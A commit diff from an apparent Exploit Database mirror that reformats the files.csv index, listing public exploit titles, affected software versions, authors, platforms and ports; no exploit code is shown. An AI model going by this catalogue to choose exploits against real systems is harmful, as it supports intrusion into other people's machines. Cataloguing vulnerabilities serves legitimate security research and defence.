bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_23_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-23 04:30:36 +00:00
parent 81eda5a35c
commit 2d7502a652
25 changed files with 1597 additions and 725 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

157
files.csv
View file

@ -1364,7 +1364,7 @@ id,file,description,date,author,platform,type,port
1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0
1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0
1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0
1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144
1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144
1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0
1628,platforms/windows/remote/1628.cpp,"MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0
1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0
@ -1408,7 +1408,7 @@ id,file,description,date,author,platform,type,port
1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit",2006-04-14,rgod,cgi,webapps,0
1678,platforms/php/webapps/1678.php,"PHP Album <= 0.3.2.3 - Remote Command Execution Exploit",2006-04-15,rgod,php,webapps,0
1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit",2006-04-15,"H D Moore",novell,remote,8300
1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0
1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - (login) SQL Injection Exploit",2006-04-15,Nicob,cgi,webapps,0
1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit",2006-04-15,N/A,windows,remote,8080
1682,platforms/php/webapps/1682.php,"Fuju News 1.0 Authentication Bypass / Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0
1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - Remote SQL Injection Exploit",2006-04-16,snatcher,php,webapps,0
@ -1647,7 +1647,7 @@ id,file,description,date,author,platform,type,port
1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (php)",2006-06-21,RusH,php,webapps,0
1940,platforms/windows/remote/1940.pm,"MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445
1940,platforms/windows/remote/1940.pm,"MS Windows RRAS - Remote Stack Overflow Exploit (MS06-025)",2006-06-22,"H D Moore",windows,remote,445
1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0
1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0
1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0
@ -4997,7 +4997,7 @@ id,file,description,date,author,platform,type,port
5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility",2008-04-04,t0pP8uZz,php,webapps,0
5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 (photo_id) SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0
5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability",2008-04-04,JIKO,php,webapps,0
5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0
5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit (meta)",2008-04-04,I)ruid,solaris,remote,0
5367,platforms/php/webapps/5367.pl,"PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0
5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability",2008-04-04,"Virangar Security",php,webapps,0
5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 (lng) Local File Inclusion Vulnerability",2008-04-04,w0cker,php,webapps,0
@ -5382,7 +5382,7 @@ id,file,description,date,author,platform,type,port
5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL injection Vulnerability",2008-06-08,His0k4,php,webapps,0
5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0
5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) Remote SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0
5762,platforms/php/webapps/5762.txt,"ProManager 0.73 (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0
5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0
5763,platforms/asp/webapps/5763.txt,"real estate web site 1.0 (sql/xss) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0
5764,platforms/php/webapps/5764.txt,"telephone directory 2008 (sql/xss) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0
5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 (article) Remote SQL Injection Vulnerability",2008-06-09,Bl@ckbe@rD,asp,webapps,0
@ -8316,7 +8316,7 @@ id,file,description,date,author,platform,type,port
8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 (cat_id) Remote SQL Injection Vulnerability",2009-05-27,taRentReXx,php,webapps,0
8818,platforms/php/webapps/8818.txt,"AdPeeps 8.5d1 XSS and HTML Injection Vulnerabilities",2009-05-27,intern0t,php,webapps,0
8819,platforms/php/webapps/8819.txt,"small pirate v-2.1 (xss/sql) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0
8820,platforms/php/webapps/8820.txt,"amember 3.1.7 (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0
8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (xss/sql/hi) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0
8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x SQL Injection Vulnerability",2009-05-29,"Chip d3 bi0s",php,webapps,0
8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit",2009-05-29,"Thierry Zoller",multiple,dos,0
8823,platforms/php/webapps/8823.txt,"Webboard <= 2.90 beta - Remote File Disclosure Vulnerability",2009-05-29,MrDoug,php,webapps,0
@ -8740,7 +8740,7 @@ id,file,description,date,author,platform,type,port
9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0
9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 (lfi/sql) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0
9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 (Cat_ID) SQL Injection Vulnerability (patched?)",2009-07-27,octopos,php,webapps,0
9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0
9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (meta)",2009-07-27,"Christoph Bott",hardware,dos,0
9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vuln",2009-07-27,int_main();,php,webapps,0
9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection Vulnerability",2009-07-27,MizoZ,php,webapps,0
9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL injection Vulnerability",2009-07-27,boom3rang,php,webapps,0
@ -9268,7 +9268,7 @@ id,file,description,date,author,platform,type,port
9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0
9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0
9885,platforms/windows/webapps/9885.txt,"httpdx <= 1.4.6b source disclosure",2009-10-21,Dr_IDE,windows,webapps,0
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer BoF",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x xss, information disclosure, injection",2009-10-26,"Antonion Parata",jsp,webapps,0
9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 remote file inclusion",2009-10-19,kaMtiEz,php,webapps,0
9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0
@ -9290,50 +9290,50 @@ id,file,description,date,author,platform,type,port
9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0
9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0
9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0
9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0
9910,platforms/php/webapps/9910.rb,"Dogfood CRM 2.0.10 spell.php Command Injection",2009-03-03,LSO,php,webapps,0
9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution",2007-08-24,patrick,multiple,remote,25
9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd <= 3.1.3 - Command Injection",2006-06-06,patrick,unix,remote,783
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon Command Execution",2002-02-01,"H D Moore",multiple,remote,3632
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution",2002-02-01,"H D Moore",multiple,remote,3632
9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 Command Execution",2009-02-25,patrick,multiple,webapps,0
9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2002-01-18,MC,solaris,remote,23
9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23
9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111
9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515
9917,platforms/solaris/remote/9917.rb,"Solaris in.telnetd TTYPROMPT - Buffer Overflow",2002-01-18,MC,solaris,remote,23
9918,platforms/solaris/remote/9918.rb,"Solaris 10, 11 Telnet - Remote Authentication Bypass",2007-02-12,MC,solaris,remote,23
9920,platforms/solaris/remote/9920.rb,"Solaris sadmind adm_build_path - Buffer Overflow",2008-10-14,"Adriano Lima",solaris,remote,111
9921,platforms/solaris/remote/9921.rb,"Solaris <= 8.0 - LPD Command Execution",2001-08-31,"H D Moore",solaris,remote,515
9922,platforms/php/webapps/9922.txt,"Oscailt CMS 3.3 - Local File Inclusion",2009-10-28,s4r4d0,php,webapps,0
9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd Heap Overflow",2002-06-10,noir,solaris,remote,6112
9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow",2002-06-10,noir,solaris,remote,6112
9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 - 2.2.8 - trans2open Overflow (OS X)",2003-04-07,"H D Moore",osx,remote,139
9925,platforms/osx/remote/9925.rb,"Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)",2009-10-28,N/A,osx,remote,0
9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser Remote File Upload/Execute Vulnerability",2009-07-22,spinbad,php,webapps,0
9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0, 10.4.8 UPnP Location Overflow (OS X)",2009-10-28,N/A,osx,remote,0
9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0
9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548
9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0
9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)",2004-07-13,ddz,osx,remote,21
9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 - Image Attachment Command Execution (OS X)",2006-03-01,"H D Moore",osx,remote,25
9930,platforms/osx/remote/9930.rb,"Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X)",2005-02-18,"H D Moore",osx,remote,0
9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X)",2004-03-03,"H D Moore",osx,remote,548
9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow",2007-01-21,toto,novell,remote,0
9933,platforms/php/webapps/9933.txt,"PHP168 6.0 Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2009-07-10,kf,multiple,remote,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution",2009-07-10,kf,multiple,remote,0
9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow",2004-05-19,spoonm,multiple,remote,3690
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow",2003-04-07,"H D Moore",linux,remote,139
9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 Describe Buffer Overflow",2002-12-20,"H D Moore",multiple,remote,0
9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 unserialize Overflow",2007-03-01,sesser,php,remote,0
9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar Buffer Overflow",2001-04-04,patrick,linux,remote,123
9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup Remote Command Execution",2004-10-21,patrick,multiple,remote,0
9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 Command Executino",2001-02-28,"H D Moore",multiple,remote,5555
9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 Memory Access",2007-04-23,"H D Moore",multiple,remote,0
9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch Command Execution",2008-10-23,egypt,multiple,remote,0
9939,platforms/php/remote/9939.rb,"PHP < 4.5.0 - unserialize Overflow",2007-03-01,sesser,php,remote,0
9940,platforms/linux/remote/9940.rb,"ntpd 4.0.99j-k readvar - Buffer Overflow",2001-04-04,patrick,linux,remote,123
9941,platforms/multiple/remote/9941.rb,"Veritas NetBackup - Remote Command Execution",2004-10-21,patrick,multiple,remote,0
9942,platforms/multiple/remote/9942.rb,"HP OpenView OmniBack II A.03.50 - Command Executino",2001-02-28,"H D Moore",multiple,remote,5555
9943,platforms/multiple/remote/9943.rb,"Apple Quicktime for Java 7 - Memory Access",2007-04-23,"H D Moore",multiple,remote,0
9944,platforms/multiple/remote/9944.rb,"Opera 9.50, 9.61 historysearch - Command Execution",2008-10-23,egypt,multiple,remote,0
9945,platforms/multiple/remote/9945.rb,"Opera <= 9.10 Configuration Overwrite",2007-03-05,egypt,multiple,remote,0
9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0
9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0
9946,platforms/multiple/remote/9946.rb,"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution",2006-07-25,"H D Moore",multiple,remote,0
9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution",2005-07-13,"H D Moore",windows,remote,0
9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit",2008-12-03,sf,multiple,remote,0
9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0
9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129
9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723
9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306
9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
9949,platforms/multiple/remote/9949.rb,"Firefox 3.5 - escape Memory Corruption Exploit",2006-07-14,"H D Moore",multiple,remote,0
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow",2007-05-14,"Adriano Lima",linux,remote,0
9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x, 3.x - NTLM Buffer Overflow",2004-06-08,skape,multiple,remote,3129
9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 and 1.1.3-20030409 - Negative Read Overflow",2003-04-09,spoonm,linux,remote,1723
9953,platforms/linux/remote/9953.rb,"MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow",2008-01-04,MC,linux,remote,3306
9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 privilege escalation",2009-10-20,trompele,hardware,local,0
9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0
9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0
@ -9383,7 +9383,7 @@ id,file,description,date,author,platform,type,port
10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0
10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0
10008,platforms/windows/remote/10008.txt,"EMC Captiva QuickScan Pro 4.6 sp1 and EMC Documentum ApllicationXtender Desktop 5.4",2009-09-30,pyrokinesis,windows,remote,0
10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0
10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
10012,platforms/multiple/webapps/10012.py,"html2ps 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0
@ -9393,25 +9393,25 @@ id,file,description,date,author,platform,type,port
10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0
10017,platforms/linux/dos/10017.c,"Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0
10018,platforms/linux/local/10018.sh,"Linux Kernel 'pipe.c' - Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0
10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007SP2 INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007, 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007, 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050
10022,platforms/linux/local/10022.c,"Linux Kernel 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,local,0
10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525
10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0
10025,platforms/linux/remote/10025.rb,"University of Washington imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143
10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080
10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525
10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0
10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143
10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 - 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit",2005-10-18,"KaiJern Lau",linux,remote,9080
10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216",2006-03-08,MC,linux,remote,7144
10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow",2005-09-13,"Raphael Rigo",cgi,remote,80
10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947
10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 - 2.7-2 - Format String Vulnerability",2005-05-25,"Yann Senotier",linux,remote,2947
10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection Vulnerability",2009-07-20,"H D Moore",linux,remote,80
10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443
10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787
10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter Command Execution",2001-09-01,"H D Moore",irix,remote,515
10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515
10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 report Buffer Overflow",2008-01-08,MC,bsd,remote,49
10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443
10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787
10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution",2001-09-01,"H D Moore",irix,remote,515
10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 - Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515
10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow",2008-01-08,MC,bsd,remote,49
10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0
10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b CGI Overflow",2004-08-19,skape,cgi,webapps,0
10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0
10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0
10039,platforms/windows/local/10039.txt,"GPG4Win GNU Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
@ -9436,7 +9436,7 @@ id,file,description,date,author,platform,type,port
10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0
10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0
10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0
